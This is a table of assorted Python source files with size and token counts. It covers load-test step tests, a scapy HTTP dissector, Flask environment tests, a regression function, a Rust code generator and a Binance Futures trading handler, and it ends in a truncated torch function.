text string | size int64 | token_count int64 |
|---|---|---|
from typing import cast
from grizzly.context import GrizzlyContext
from grizzly.steps import * # pylint: disable=unused-wildcard-import # noqa: F403
from ....fixtures import BehaveFixture
def test_step_results_fail_ratio(behave_fixture: BehaveFixture) -> None:
    """A fail-ratio percentage is stored as a fraction and enables scenario validation."""
    behave = behave_fixture.context
    grizzly = cast(GrizzlyContext, behave.grizzly)
    scenario = grizzly.scenario

    # No validation is configured by default.
    assert scenario.validation.fail_ratio is None
    assert not scenario.should_validate()

    step_results_fail_ratio(behave, 10)

    # 10 (percent) is stored as the fraction 0.1 and validation is now active.
    assert scenario.validation.fail_ratio == 0.1
    assert scenario.should_validate()
def test_step_results_avg_response_time(behave_fixture: BehaveFixture) -> None:
    """An average-response-time threshold is stored as-is and enables validation."""
    behave = behave_fixture.context
    grizzly = cast(GrizzlyContext, behave.grizzly)
    scenario = grizzly.scenario

    # No validation is configured by default.
    assert scenario.validation.avg_response_time is None
    assert not scenario.should_validate()

    step_results_avg_response_time(behave, 200)

    assert scenario.validation.avg_response_time == 200
    assert scenario.should_validate()
def test_step_results_response_time_percentile(behave_fixture: BehaveFixture) -> None:
    """A percentile threshold creates a percentile object (fraction + time) and enables validation."""
    behave = behave_fixture.context
    grizzly = cast(GrizzlyContext, behave.grizzly)
    scenario = grizzly.scenario

    # No validation is configured by default.
    assert scenario.validation.response_time_percentile is None
    assert not scenario.should_validate()

    step_results_response_time_percentile(behave, 95, 800)

    percentile_validation = getattr(scenario.validation, 'response_time_percentile', None)
    assert percentile_validation is not None
    # 95 (percent) is stored as the fraction 0.95, paired with the 800 ms limit.
    assert getattr(percentile_validation, 'percentile', None) == 0.95
    assert getattr(percentile_validation, 'response_time', None) == 800
    assert scenario.should_validate()
| 1,785 | 632 |
"""Module for over expression tokenization."""
from .basic_regex_tokenizer import BasicRegexTokenizer
class OverExpression(BasicRegexTokenizer):
    """Tokenizer recognising the phrase "over expression" (with or without the space)."""

    def pattern(self) -> str:
        """Regex matching 'over expression' or 'overexpression' as a whole word."""
        return r'\bover ?expression\b'

    def token_type(self) -> str:
        """Label attached to tokens produced by this tokenizer."""
        return 'OverExpression'
| 419 | 111 |
#!/usr/bin/env python3
from pathlib import Path
from jq_normaliser import JqNormaliser, Filter
class HypNormaliser(JqNormaliser):
    """jq-based normaliser for Hypothesis backups with a fixed policy baked in."""
    def __init__(self, *args, **kwargs) -> None:
        # Fixed configuration: tag log lines, drop dominated snapshots, never keep both duplicates.
        super().__init__(*args, **kwargs, logger_tag='hypothesis-normaliser', delete_dominated=True, keep_both=False) # type: ignore
    def cleanup(self) -> Filter:
        """Identity jq filter — no cleanup transformation is applied."""
        return '.'
def main():
    """Entry point: construct the Hypothesis normaliser and run its CLI."""
    HypNormaliser().main()


if __name__ == '__main__':
    main()
| 465 | 157 |
#! /usr/bin/env python
# -*- coding: UTF-8 -*-
# Author : Steeve Barbeau, Luca Invernizzi
# This program is published under a GPLv2 license
import re
from scapy.all import TCP, bind_layers, Packet, StrField
def _canonicalize_header(name):
''' Takes a header key (i.e., "Host" in "Host: www.google.com",
and returns a canonical representation of it '''
return name.strip().lower()
def _parse_headers(s):
    ''' Takes a HTTP packet, and returns a tuple containing:
        - the first line (e.g., "GET ...")
        - the headers in a dictionary, keyed by canonical (lower-case) name,
          with the full stripped header line as the value
        - the body '''
    try:
        headers, body = s.split("\r\n\r\n", 1)
    except ValueError:
        # No blank line separating headers from body: the whole string is headers.
        headers = s
        body = ''
    header_lines = headers.split("\r\n")
    first_line, header_lines = header_lines[0].strip(), header_lines[1:]
    headers_found = {}
    for header_line in header_lines:
        # Skip malformed lines that carry no "name: value" separator.
        if ':' not in header_line:
            continue
        key, _ = header_line.split(':', 1)
        headers_found[_canonicalize_header(key)] = header_line.strip()
    return first_line, headers_found, body
def _dissect_headers(obj, s):
    ''' Takes a HTTP packet as the string s, and populates the scapy layer obj
        (either HTTPResponse or HTTPRequest). Returns the first line of the
        HTTP packet, and the body
    '''
    first_line, headers, body = _parse_headers(s)
    for f in obj.fields_desc:
        canonical_name = _canonicalize_header(f.name)
        try:
            # pop() both fetches the header line and removes it, so whatever
            # remains afterwards goes into Additional-Headers.
            header_line = headers.pop(canonical_name)
        except KeyError:
            # Header not present in this packet; leave the field unset.
            continue
        _, value = header_line.split(':', 1)
        obj.setfieldval(f.name, value.strip())
    if headers:
        # Headers with no dedicated field are preserved verbatim.
        obj.setfieldval(
            'Additional-Headers', '\r\n'.join(headers.values()) + '\r\n')
    return first_line, body
def _self_build(obj, field_pos_list=None):
    ''' Takes an HTTPRequest or HTTPResponse object, and creates its internal
        scapy representation as a string. That is, generates the HTTP
        packet as a string '''
    packet_str = ""
    for field in obj.fields_desc:
        value = obj.getfieldval(field.name)
        # Unset/empty fields are simply omitted from the output.
        if not value:
            continue
        value += '\r\n'
        if field.name in ('Method', 'Additional-Headers', 'Status-Line'):
            # These fields are emitted verbatim, without a "Name: " prefix.
            packet_str = field.addfield(obj, packet_str, value)
        else:
            packet_str = field.addfield(obj, packet_str, "%s: %s" % (field.name, value))
    return packet_str
class HTTPRequest(Packet):
    """Scapy layer for an HTTP request: request line plus one field per known header."""
    name = "HTTP Request"
    # Anchored alternation of the RFC 2616 request methods.
    http_methods = "^(OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT)"
    fields_desc = [StrField("Method", None, fmt="H"),
                   StrField("Path", None, fmt="H"),
                   StrField("Http-Version", None, fmt="H"),
                   StrField("Host", None, fmt="H"),
                   StrField("User-Agent", None, fmt="H"),
                   StrField("Accept", None, fmt="H"),
                   StrField("Accept-Language", None, fmt="H"),
                   StrField("Accept-Encoding", None, fmt="H"),
                   StrField("Accept-Charset", None, fmt="H"),
                   StrField("Referer", None, fmt="H"),
                   StrField("Authorization", None, fmt="H"),
                   StrField("Expect", None, fmt="H"),
                   StrField("From", None, fmt="H"),
                   StrField("If-Match", None, fmt="H"),
                   StrField("If-Modified-Since", None, fmt="H"),
                   StrField("If-None-Match", None, fmt="H"),
                   StrField("If-Range", None, fmt="H"),
                   StrField("If-Unmodified-Since", None, fmt="H"),
                   StrField("Max-Forwards", None, fmt="H"),
                   StrField("Proxy-Authorization", None, fmt="H"),
                   StrField("Range", None, fmt="H"),
                   StrField("TE", None, fmt="H"),
                   StrField("Cache-Control", None, fmt="H"),
                   StrField("Connection", None, fmt="H"),
                   StrField("Date", None, fmt="H"),
                   StrField("Pragma", None, fmt="H"),
                   StrField("Trailer", None, fmt="H"),
                   StrField("Transfer-Encoding", None, fmt="H"),
                   StrField("Upgrade", None, fmt="H"),
                   StrField("Via", None, fmt="H"),
                   StrField("Warning", None, fmt="H"),
                   StrField("Keep-Alive", None, fmt="H"),
                   StrField("Allow", None, fmt="H"),
                   StrField("Content-Encoding", None, fmt="H"),
                   StrField("Content-Language", None, fmt="H"),
                   StrField("Content-Length", None, fmt="H"),
                   StrField("Content-Location", None, fmt="H"),
                   StrField("Content-MD5", None, fmt="H"),
                   StrField("Content-Range", None, fmt="H"),
                   StrField("Content-Type", None, fmt="H"),
                   StrField("Expires", None, fmt="H"),
                   StrField("Last-Modified", None, fmt="H"),
                   StrField("Cookie", None, fmt="H"),
                   StrField("Additional-Headers", None, fmt="H")]

    def do_dissect(self, s):
        ''' From the HTTP packet string, populate the scapy object '''
        first_line, body = _dissect_headers(self, s)
        # Request line is "<Method> <Path> <HTTP-Version>".
        # BUG FIX: use a raw string so "\s" is not an invalid escape sequence
        # (a SyntaxWarning today, a SyntaxError in future Python versions).
        method, path, http_version = re.split(r"\s+", first_line)
        self.setfieldval('Method', method)
        self.setfieldval('Path', path)
        self.setfieldval('Http-Version', http_version)
        return body

    def self_build(self, field_pos_list=None):
        ''' Generate the HTTP packet string (the opposite of do_dissect) '''
        return _self_build(self, field_pos_list)
class HTTPResponse(Packet):
    """Scapy layer for an HTTP response: status line plus one field per known header."""
    name = "HTTP Response"
    fields_desc = [StrField("Status-Line", None, fmt="H"),
                   StrField("Accept-Ranges", None, fmt="H"),
                   StrField("Age", None, fmt="H"),
                   StrField("E-Tag", None, fmt="H"),
                   StrField("Location", None, fmt="H"),
                   StrField("Proxy-Authenticate", None, fmt="H"),
                   StrField("Retry-After", None, fmt="H"),
                   StrField("Server", None, fmt="H"),
                   StrField("Vary", None, fmt="H"),
                   StrField("WWW-Authenticate", None, fmt="H"),
                   StrField("Cache-Control", None, fmt="H"),
                   StrField("Connection", None, fmt="H"),
                   StrField("Date", None, fmt="H"),
                   StrField("Pragma", None, fmt="H"),
                   StrField("Trailer", None, fmt="H"),
                   StrField("Transfer-Encoding", None, fmt="H"),
                   StrField("Upgrade", None, fmt="H"),
                   StrField("Via", None, fmt="H"),
                   StrField("Warning", None, fmt="H"),
                   StrField("Keep-Alive", None, fmt="H"),
                   StrField("Allow", None, fmt="H"),
                   StrField("Content-Encoding", None, fmt="H"),
                   StrField("Content-Language", None, fmt="H"),
                   StrField("Content-Length", None, fmt="H"),
                   StrField("Content-Location", None, fmt="H"),
                   StrField("Content-MD5", None, fmt="H"),
                   StrField("Content-Range", None, fmt="H"),
                   StrField("Content-Type", None, fmt="H"),
                   StrField("Expires", None, fmt="H"),
                   StrField("Last-Modified", None, fmt="H"),
                   StrField("Additional-Headers", None, fmt="H")]

    def do_dissect(self, s):
        ''' From the HTTP packet string, populate the scapy object '''
        first_line, body = _dissect_headers(self, s)
        # The whole status line (e.g. "HTTP/1.1 200 OK") is kept as one field.
        self.setfieldval('Status-Line', first_line)
        return body

    def self_build(self, field_pos_list=None):
        ''' Generate the HTTP packet string (the opposite of do_dissect) '''
        return _self_build(self, field_pos_list)
class HTTP(Packet):
    """Container layer bound to TCP; decides whether its payload is a request or response."""
    name = "HTTP"

    def do_dissect(self, s):
        # Keep the raw payload untouched; HTTPRequest/HTTPResponse do the parsing.
        return s

    def guess_payload_class(self, payload):
        ''' Decides if the payload is an HTTP Request or Response, or
            something else '''
        try:
            prog = re.compile(
                r"^(?:OPTIONS|GET|HEAD|POST|PUT|DELETE|TRACE|CONNECT) "
                r"(?:.+?) "
                r"HTTP/\d\.\d$"
            )
            req = payload[:payload.index("\r\n")]
            if prog.match(req):
                return HTTPRequest
            prog = re.compile(r"^HTTP/\d\.\d \d\d\d .+?$")
            if prog.match(req):
                return HTTPResponse
        # BUG FIX: narrowed from a bare except. ValueError: payload has no
        # "\r\n"; TypeError: a bytes payload mixed with str patterns/indexing.
        except (ValueError, TypeError):
            pass
        return Packet.guess_payload_class(self, payload)
bind_layers(TCP, HTTP)
| 8,506 | 2,463 |
import os
import unittest
from flask_app.boot import load_dot_env, reset, is_loaded, load_env
from tests.unit.testutils import BaseUnitTestCase, get_function_name
from unittest_data_provider import data_provider
def get_env():
    """Data provider for test_load_env: (environment name, expected is_loaded) pairs."""
    environments = (None, 'dev', 'development', 'integration', 'staging', 'production')
    # load_env() is expected to succeed for every environment.
    return tuple((env, True) for env in environments)
def get_load_dot_env():
    """Data provider for test_load_dot_env: (environment name, expected is_loaded) pairs.

    Only local/dev-style environments ship a .env file, so the deployed
    environments expect False.
    """
    expectations = {
        None: True,
        'dev': True,
        'development': True,
        'integration': False,
        'staging': False,
        'production': False,
    }
    return tuple(expectations.items())
class BootTestCase(BaseUnitTestCase):
    """Unit tests for flask_app.boot environment loading.

    Behaviour depends on the APP_TYPE environment variable: load_env() is only
    exercised under Chalice, load_dot_env() only under Flask; otherwise the
    test is skipped.
    """

    @data_provider(get_env)
    def test_load_env(self, env, expected):
        # Parametrised over get_env(): every environment name should load.
        self.logger.info('Running test: %s - %s', get_function_name(__name__), env)
        APP_TYPE = os.environ['APP_TYPE']
        self.logger.info("APP_TYPE: {}".format(APP_TYPE))
        if APP_TYPE == 'Chalice':
            # reset() clears any previously loaded state before each case.
            reset()
            load_env(env)
            self.assertEqual(is_loaded(), expected)
        else:
            self.skipTest('test_load_env - Ignored because the APP_TYPE {}'.format(APP_TYPE))

    @data_provider(get_load_dot_env)
    def test_load_dot_env(self, env, expected):
        # Parametrised over get_load_dot_env(): only dev-style environments
        # are expected to have a .env file available.
        self.logger.info('Running test: %s - %s', get_function_name(__name__), env)
        APP_TYPE = os.environ['APP_TYPE']
        self.logger.info("APP_TYPE: {}".format(APP_TYPE))
        if APP_TYPE == 'Flask':
            # AWS Image condition
            # When the image declares ENVIRONMENT_NAME and it matches the case
            # under test, a .env is known to exist, so the expectation flips.
            if 'ENVIRONMENT_NAME' in os.environ:
                if env == os.environ['ENVIRONMENT_NAME']:
                    expected = True
            reset()
            load_dot_env(env)
            self.assertEqual(is_loaded(), expected)
        else:
            self.skipTest('test_load_dot_env - Ignored because the APP_TYPE {}'.format(APP_TYPE))
# Allow running this test module directly with the stdlib runner.
if __name__ == '__main__':
    unittest.main()
| 1,800 | 566 |
def QuadraticRegression(px, py):
    """Least-squares fit of y = a + b*x + c*x**2 through the points (px, py).

    Solves the normal equations for a quadratic polynomial via the closed-form
    elimination of the intercept. Requires len(px) == len(py) >= 3 points that
    are not all at the same x.

    :param px: sequence of x coordinates
    :param py: sequence of y coordinates
    :return: tuple (a, b, c) of the fitted coefficients
    """
    n = len(px)
    sumy = sumx1 = sumx2 = sumx3 = sumx4 = sumxy = sumx2y = 0
    for x, y in zip(px, py):
        sumx1 += x
        sumx2 += x * x
        sumx3 += x ** 3
        sumx4 += x ** 4
        sumy += y
        # BUG FIX: these two sums were never accumulated in the original loop,
        # so sumxy was always 0 and the Σ(x²·y) term was missing entirely.
        sumxy += x * y
        sumx2y += x * x * y
    # Closed-form solution for c after eliminating the intercept a.
    # BUG FIX: the second numerator factor used sumx2 where Σ(x²·y) belongs.
    p = (n * sumxy - sumx1 * sumy) * (n * sumx3 - sumx2 * sumx1) \
        - (n * sumx2y - sumx2 * sumy) * (n * sumx2 - sumx1 * sumx1)
    q = (n * sumx3 - sumx1 * sumx2) * (n * sumx3 - sumx2 * sumx1) \
        - (n * sumx4 - sumx2 * sumx2) * (n * sumx2 - sumx1 * sumx1)
    c = p / q
    b = ((n * sumxy - sumx1 * sumy) - c * (n * sumx3 - sumx1 * sumx2)) / (n * sumx2 - sumx1 * sumx1)
    a = (sumy - b * sumx1 - c * sumx2) / n
    return a, b, c
# Demo: fit a quadratic to five sample points and print (a, b, c).
x=[0,1,2,3,4]
y=[1,1.8,1.3,2.5,6.3]
print(QuadraticRegression(x,y))
| 805 | 419 |
from typing import Any, Dict, Optional
from atcodertools.codegen.code_style_config import CodeStyleConfig
from atcodertools.codegen.models.code_gen_args import CodeGenArgs
from atcodertools.codegen.template_engine import render
from atcodertools.fmtprediction.models.format import (Format, ParallelPattern,
Pattern, SingularPattern,
TwoDimensionalPattern)
from atcodertools.fmtprediction.models.type import Type
from atcodertools.fmtprediction.models.variable import Variable
class RustCodeGenerator:
    """Generates Rust-specific template parameters from a predicted input format.

    Produces `let` type declarations plus a proconio-style `input!` macro body
    for singular values, 1-D arrays and 2-D arrays.
    """

    def __init__(self,
                 format_: Optional[Format[Variable]],
                 config: CodeStyleConfig) -> None:
        # format_ is None when format prediction failed for the problem.
        self._format = format_
        self._config = config

    def generate_parameters(self) -> Dict[str, Any]:
        """Return the keyword arguments consumed by the Rust code template."""
        if self._format is None:
            return dict(prediction_success=False)
        return dict(formal_arguments=self._formal_arguments(),
                    actual_arguments=self._actual_arguments(),
                    input_part=self._input_part(),
                    prediction_success=True)

    def _input_part(self):
        """Build the input section: `let` declarations, then the `input!` block."""
        lines = []
        # First pass: one type-annotated `let` declaration per variable.
        for pattern in self._format.sequence:
            var = pattern.all_vars()[0]
            if isinstance(pattern, SingularPattern):
                lines.append(self._generate_value_type_annotation(var))
            elif isinstance(pattern, ParallelPattern):
                lines.append(self._generate_array_type_annotation(var))
            elif isinstance(pattern, TwoDimensionalPattern):
                lines.append(self._generate_2darray_type_annotation(var))
            else:
                raise NotImplementedError
        lines.append('')
        lines.append('input! {')
        # Second pass: the matching entries inside the `input!` macro.
        for pattern in self._format.sequence:
            var = pattern.all_vars()[0]
            input_indent = ' '
            if isinstance(pattern, SingularPattern):
                lines.append(input_indent + self._generate_value_input(var))
            elif isinstance(pattern, ParallelPattern):
                lines.append(input_indent + self._generate_array_input(var))
            elif isinstance(pattern, TwoDimensionalPattern):
                lines.append(input_indent + self._generate_2darray_input(var))
            else:
                raise NotImplementedError
        lines.append('};')
        return "\n".join(lines)

    def _generate_value_type_annotation(self, var: Variable):
        """`let` declaration for a scalar variable."""
        return 'let {name}: {type};'.format(
            type=self._to_rust_type(var.type),
            name=self._var_name(var.name, True))

    def _generate_array_type_annotation(self, var: Variable):
        """`let` declaration for a 1-D array variable."""
        return 'let {name}: Vec<{type}>;'.format(
            name=self._var_name(var.name, False),
            type=self._to_rust_type(var.type))

    def _generate_2darray_type_annotation(self, var: Variable):
        """`let` declaration for a 2-D array variable."""
        return 'let {name}: Vec<Vec<{type}>>;'.format(
            name=self._var_name(var.name, False),
            type=self._to_rust_type(var.type))

    def _to_rust_type(self, type_: Type):
        """Map a predicted type to the Rust type used in declarations."""
        if type_ == Type.int:
            return 'i64'
        if type_ == Type.float:
            return 'f64'
        if type_ == Type.str:
            # Strings are declared as char vectors to match the `chars` input type.
            return 'Vec<char>'
        else:
            raise NotImplementedError

    def _generate_value_input(self, var: Variable):
        """`input!` entry for a scalar variable."""
        return '{name}: {type},'.format(
            name=self._var_name(var.name, True),
            type=self._to_input_type(var.type))

    def _generate_array_input(self, var: Variable):
        """`input!` entry for a 1-D array; length may be a variable or a constant."""
        length = var.first_index.get_length()
        return '{name}: [{type}; {num_rows} as usize],'.format(
            name=self._var_name(var.name, False),
            type=self._to_input_type(var.type),
            num_rows=self._var_name(str(length), True) if length.is_variable_node() else length)

    def _generate_2darray_input(self, var: Variable):
        """`input!` entry for a 2-D array; both dimensions may be variables or constants."""
        second_length = var.second_index.get_length()
        first_length = var.first_index.get_length()
        return '{name}: [[{type}; {num_cols} as usize]; {num_rows} as usize],'.format(
            name=self._var_name(var.name, False),
            type=self._to_input_type(var.type),
            num_cols=self._var_name(str(second_length), True) if second_length.is_variable_node() else second_length,
            num_rows=self._var_name(str(first_length), True) if first_length.is_variable_node() else first_length)

    def _to_input_type(self, type_: Type):
        """Map a predicted type to the marker used inside the `input!` macro."""
        if type_ == Type.int:
            return 'i64'
        if type_ == Type.float:
            return 'f64'
        if type_ == Type.str:
            return 'chars'
        else:
            raise NotImplementedError

    def _var_name(self, name: str, singular: bool) -> str:
        """Lower-case the variable name; pluralise arrays with a trailing 's'."""
        if singular:
            return name.lower()
        # `as` is a reserved word
        if name == 'A':
            return 'As'
        return name.lower() + 's'

    def _actual_arguments(self) -> str:
        """
        :return always empty string
        """
        return ''

    def _formal_arguments(self) -> str:
        """
        :return always empty string
        """
        return ''
class NoPredictionResultGiven(Exception):
    """Raised when code generation is attempted without a format prediction result."""
def main(args: CodeGenArgs) -> str:
    """Render the Rust code template using parameters derived from the predicted format."""
    generator = RustCodeGenerator(args.format, args.config)
    parameters = generator.generate_parameters()
    return render(
        args.template,
        mod=args.constants.mod,
        yes_str=args.constants.yes_str,
        no_str=args.constants.no_str,
        **parameters
    )
| 5,591 | 1,607 |
"""
This module contains an implementation for Binance Futures (BinanceFuturesExchangeHandler)
"""
from __future__ import annotations
import pandas as pd
import typing
import json
import logging
import pandas as pd
from datetime import datetime
from dataclasses import dataclass
from . import futurespy as fp
from . import AbstractExchangeHandler
class BinanceFuturesExchangeHandler(AbstractExchangeHandler):
exchange_information = fp.MarketData().exchange_info()
def __init__(self, public_key, private_key):
super().__init__(public_key, private_key)
self._client = fp.Client(
testnet=False, api_key=self._public_key, sec_key=self._private_key
)
self._orderId_dict = {}
self._clOrderId_dict = {}
self.logger = logging.Logger(__name__)
def get_symbols_data(self) -> typing.Dict[str, AbstractExchangeHandler.SymbolData]:
symbols_dict = {}
exchange_symbols_data = BinanceFuturesExchangeHandler.exchange_information[
"symbols"
]
for symbol_data in exchange_symbols_data:
min_volume = float(symbol_data["filters"][1]["minQty"])
max_volume = float(symbol_data["filters"][1]["maxQty"])
step_size = float(symbol_data["filters"][1]["stepSize"])
symbols_dict[symbol_data["symbol"]] = self.SymbolData(
min_volume=min_volume, max_volume=max_volume, step_size=step_size
)
return symbols_dict
def start_kline_socket(
self,
on_update: typing.Callable[[AbstractExchangeHandler.KlineCallback], None],
candle_type: str,
pair_name: str,
) -> None:
def _on_update(message):
candle = message["k"]
on_update(
self.KlineCallback(
time=pd.to_datetime(candle["t"], unit="ms"),
open=float(candle["o"]),
high=float(candle["h"]),
low=float(candle["l"]),
close=float(candle["c"]),
volume=float(candle["v"]),
final=candle["x"],
message=message,
)
)
ws = fp.WebsocketMarket(
symbol=pair_name,
on_message=lambda _, message: _on_update(message),
on_close=lambda _: self.start_kline_socket(
on_update, candle_type, pair_name
),
interval=candle_type,
)
ws.candle_socket()
def start_price_socket(
self,
on_update: typing.Callable[[AbstractExchangeHandler.PriceCallback], None],
pair_name: str,
) -> None:
def _on_update(message):
on_update(self.PriceCallback(float(message["p"])))
ws = fp.WebsocketMarket(
symbol=pair_name,
on_message=lambda _, message: _on_update(message),
on_close=lambda _: self.start_price_socket(on_update, pair_name),
)
ws.mark_price_socket()
def start_user_update_socket(
self, on_update: typing.Callable[[AbstractExchangeHandler.UserUpdate], None]
) -> None:
super().start_user_update_socket(on_update)
for data in self._client.balance():
on_update(self.BalanceUpdate(balance=data["balance"], symbol=data["asset"]))
for event in self._client.current_open_orders():
order_data = dict(
orderID=str(event["orderId"]),
client_orderID=str(event["clientOrderId"]),
status=event["status"],
symbol=event["symbol"],
price=float(event["price"]),
average_price=float(event["avgPrice"]),
fee=float(event["n"]) if "n" in event else 0,
fee_asset=event["N"] if "N" in event else "",
volume=float(event["origQty"]),
volume_realized=float(event["executedQty"]),
time=pd.to_datetime(event["time"], unit="ms"),
message=event,
)
self._register_order_data(order_data)
on_update(self.OrderUpdate(**order_data))
for position in self._client.position_info():
on_update(
self.PositionUpdate(
symbol=position["symbol"],
size=float(position["positionAmt"]),
value=float(position["positionAmt"])
* float(position["entryPrice"]),
entry_price=float(position["entryPrice"]),
liquidation_price=float(position["liquidationPrice"]),
)
)
def _on_update_recieved(message: typing.Dict[str, typing.Any]) -> None:
if message["e"] == "ACCOUNT_UPDATE":
for balance in message["a"]["B"]:
on_update(
self.BalanceUpdate(balance=balance["wb"], symbol=balance["a"])
)
for position in message["a"]["P"]:
on_update(
self.PositionUpdate(
symbol=position["s"],
size=float(position["pa"]),
value=float(position["pa"]) * float(position["ep"]),
entry_price=float(position["ep"]),
liquidation_price=float("nan"), # TODO
)
)
elif message["e"] == "ORDER_TRADE_UPDATE":
event = message["o"]
order_data = dict(
orderID=str(event["i"]),
client_orderID=str(event["c"]),
status=event["X"],
symbol=event["s"],
price=float(event["p"]),
average_price=float(event["ap"]),
fee=float(event["n"]) if "n" in event else 0,
fee_asset=event["N"] if "N" in event else "",
volume=float(event["q"]),
volume_realized=float(event["z"]),
time=pd.to_datetime(event["T"], unit="ms"),
message=message,
)
self._register_order_data(order_data)
on_update(self.OrderUpdate(**order_data))
self._client.user_update_socket(
on_message=lambda ws, message: _on_update_recieved(json.loads(message)),
on_close=lambda x: self.start_user_update_socket(on_update),
)
def _round_price(
self, symbol: str, price: typing.Optional[float]
) -> typing.Optional[float]:
for d in self.exchange_information["symbols"]:
if d["symbol"] == symbol:
price_precision = d["pricePrecision"]
break
else:
raise ValueError(f"{symbol} is not in exchange info")
return None if price is None else round(price, price_precision)
_T = typing.TypeVar("_T", float, None)
def _round_volume(self, symbol: str, volume: _T) -> _T:
for d in self.exchange_information["symbols"]:
if d["symbol"] == symbol:
quantity_precision = d["quantityPrecision"]
break
else:
raise ValueError(f"{symbol} is not in exchange info")
if (
not isinstance(volume, float)
and not isinstance(volume, int)
and volume is not None
):
raise ValueError
return (
None
if volume is None
else round(typing.cast(float, volume), quantity_precision)
)
@staticmethod
def get_pairs_list() -> typing.List[str]:
"""get_pairs_list Returns all available pairs on exchange
Returns:
typing.List[str]: The list of symbol strings
"""
return [
pair["symbol"]
for pair in BinanceFuturesExchangeHandler.exchange_information["symbols"]
]
async def load_historical_data(
self, symbol: str, candle_type: str, amount: int
) -> pd.DataFrame:
"""load_historical_data Loads historical klines from exchange
Args:
symbol (str): Pair name
candle_type (str): Exchange specific type of candles ("1m" for example)
amount (int): Number of klines to load
Returns:
pd.DataFrame: Dataframe with columns: Date, Open, High, Low, Close, Volume
"""
marketDataLoader = fp.MarketData(
symbol=symbol, interval=candle_type, testnet=False
)
data = marketDataLoader.load_historical_candles(count=amount).iloc[:-1]
data = data[["Date", "Open", "High", "Low", "Close", "Volume"]]
return data
async def create_order(
self,
symbol: str,
side: str,
price: typing.Optional[float],
volume: float,
client_ordID: typing.Optional[str] = None,
) -> AbstractExchangeHandler.NewOrderData:
"""create_order Place one limit or market order
Args:
symbol (str): Pair name, for which to place an order
side (str): "Buy" or "Sell"
price (typing.Optional[float]): If the price is set,
the price for limit order. Else - market order.
volume (float): The volume of the order
client_ordID (typing.Optional[str], optional): Client order_id.
Could be generated using generate_client_order_id(). Defaults to None.
Returns:
AbstractExchangeHandler.NewOrderData: Data of the resulting order.
"""
if client_ordID is None:
if price is not None:
result = self._client.new_order(
symbol=symbol,
side=side.upper(),
orderType="LIMIT",
quantity=self._round_volume(symbol, volume),
price=self._round_price(symbol, price),
timeInForce="GTX", # POST ONLY
)
else:
result = self._client.new_order(
symbol=symbol,
side=side.upper(),
quantity=self._round_volume(symbol, volume),
orderType="MARKET",
)
else:
self._user_update_pending(
client_ordID,
self._round_price(symbol, price),
self._round_volume(symbol, volume),
symbol,
side.upper(),
)
if price is not None:
result = self._client.new_order(
newClientOrderId=client_ordID,
symbol=symbol,
side=side.upper(),
orderType="LIMIT",
quantity=self._round_volume(symbol, volume),
price=self._round_price(symbol, price),
timeInForce="GTX", # POST ONLY
)
else:
result = self._client.new_order(
newClientOrderId=client_ordID,
symbol=symbol,
quantity=self._round_volume(symbol, volume),
side=side.upper(),
orderType="MARKET",
)
try:
return AbstractExchangeHandler.NewOrderData(
orderID=result["orderId"], client_orderID=result["clientOrderId"]
)
except:
if client_ordID is not None:
self._user_update_failed(client_ordID)
return AbstractExchangeHandler.NewOrderData(
orderID="", client_orderID=client_ordID
)
else:
raise
async def create_orders(
self,
symbol: str,
data: typing.List[typing.Tuple[str, float, float, typing.Optional[str]]],
) -> typing.List[AbstractExchangeHandler.NewOrderData]:
"""create_orders Create a lot of orders from one request (if the exchange supports it)
If the exchange does not support it, should create a parallel http requests, but it should be warned in docstring.
Args:
symbol (str): Pair name, for which to place orders
data (typing.List[typing.Tuple[str, float, float, typing.Optional[str]]]): The list of tuple params like in
create_order() - (side, price, volume, client_ordID), except price should not be None.
Returns:
typing.List[AbstractExchangeHandler.NewOrderData]: List of results
"""
orders: typing.List[typing.Dict[str, typing.Union[str, float]]] = [
{
"symbol": symbol,
"side": order_data[0].upper(),
"type": "LIMIT",
"quantity": self._round_volume(symbol, order_data[2]),
"price": typing.cast(float, self._round_price(symbol, order_data[1])),
# "timeInForce" : "GTX" # POST ONLY
}
if len(order_data) == 3 or order_data[3] is None
else {
"clOrdID": order_data[3],
"symbol": symbol,
"side": order_data[0].upper(),
"type": "LIMIT",
"quantity": self._round_volume(symbol, order_data[2]),
"price": typing.cast(float, self._round_price(symbol, order_data[1])),
# "timeInForce" : "GTX" # POST ONLY
}
for order_data in data
]
for order in orders:
self._user_update_pending(
client_orderID=str(order["clOrdID"]),
price=float(order["price"]),
volume=float(order["quantity"]),
symbol=str(order["symbol"]),
side=str(order["side"]),
)
results = []
orders_list = self._split_list(lst=orders, size=5)
for tmp_orders_list in orders_list:
results.append(self._client.place_multiple_orders(tmp_orders_list))
return [
AbstractExchangeHandler.NewOrderData(
orderID=result["orderID"], client_orderID=result["clOrdID"]
)
for result in results
]
async def cancel_order(
self,
order_id: typing.Optional[str] = None,
client_orderID: typing.Optional[str] = None,
) -> None:
"""cancel_order Cancel one order via order_id or client_orderID
Either order_id or client_orderID should be sent.
If both are sent, will use order_id.
Args:
order_id (typing.Optional[str], optional): Server's order id. Defaults to None.
client_orderID (typing.Optional[str], optional): Client's order id. Defaults to None.
"""
self._user_update_pending_cancel(
order_id=order_id, client_orderID=client_orderID
)
if order_id is not None and order_id in self._order_table_id:
self._client.cancel_order(
symbol=self._order_table_id[order_id]["symbol"], orderId=order_id
)
elif client_orderID is not None and client_orderID in self._order_table_clid:
self._client.cancel_order(
symbol=self._order_table_clid[client_orderID]["symbol"],
orderId=client_orderID,
clientID=True,
)
else:
raise ValueError(
"Either order_id of client_orderID should be sent, but both are None"
)
@staticmethod
def _split_list(lst, size):
return [lst[i : i + size] for i in range(0, len(lst), size)]
async def cancel_orders(self, orders: typing.List[str]) -> None:
"""cancel_orders Cancels a lot of orders in one requets
If the exchange does not support it, should create a parallel http requests, but it should be warned in docstring.
Args:
orders (typing.List[str]): The list of server's order_ids.
"""
for order_id in orders:
self._user_update_pending_cancel(order_id=order_id)
to_cancel_dict: typing.Dict[str, typing.List[str]] = {}
for order in orders:
order_symbol: str = self._order_table_id[order]["symbol"]
if order_symbol not in to_cancel_dict:
to_cancel_dict[order_symbol] = []
to_cancel_dict[order_symbol].append(order)
results = []
for symbol in to_cancel_dict.keys():
tmp_list = self._split_list(to_cancel_dict[symbol], 10)
for lst in tmp_list:
result = self._client.cancel_multiple_orders(
symbol=symbol, orderIdList=lst
)
results.append(result)
| 16,873 | 4,580 |
# Package metadata: distribution name and semantic version.
name = 'orbit'
__version__ = '1.0.10'
| 39 | 22 |
import torch
from typing import Union, Iterable
def center(k: torch.Tensor) -> torch.Tensor:
